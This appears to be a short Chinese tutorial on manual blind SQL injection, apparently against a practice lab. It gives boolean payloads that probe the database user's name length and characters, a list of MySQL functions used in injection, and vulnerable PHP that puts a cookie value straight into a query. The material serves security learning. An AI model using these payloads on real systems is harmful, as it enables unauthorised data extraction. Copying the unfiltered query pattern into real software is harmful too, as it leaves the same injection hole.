0-SQL盲注的手工注入测试
确定字段长度
1' and length(user())>12#
确定字段内容
1' and substring(user(),1,1)>'a'#
这里的substring()函数的作用是提取字符串中的字符.例如:
substring('abcd',1,1)返回a
substring('abcd',3,1)返回c
substring('abcd',3,2)返回cd
基于MYSQL的SQL注入常用函数
find_in_set()
length()
user()
version()
database()
left()
right()
substring()
count()
rand()
floor()
concat()
group_concat()
limit()
1-配合burpsuite进行SQL盲注攻击
使用BurpSuite更改了http请求报文,测试出了SQL盲注漏洞,原理与上一节中SQL盲注的手工注入测试一样
2-特殊页面下的SQL盲注入
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";//依旧是没有对用户的输入进行过滤,直接就放进数据库执行去了。
$result = mysql_query( $getid ); // 返回数据库的执行结果。
// Get results
$num = @mysql_numrows( $result ); // 返回结果集中行的数目。@表示不显示错,即有错误返回空。
if( $num > 0 ) {
// 数据库有返回消息
echo '<pre>User ID exists in the database.</pre>';
}
else {
// 随机休眠,防止暴力输入PAYLOAD
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// 返回没有该用户
echo '<pre>User ID is MISSING from the database.</pre>';
}
mysql_close();
}
?>
RM-Anton原创,转载请注明。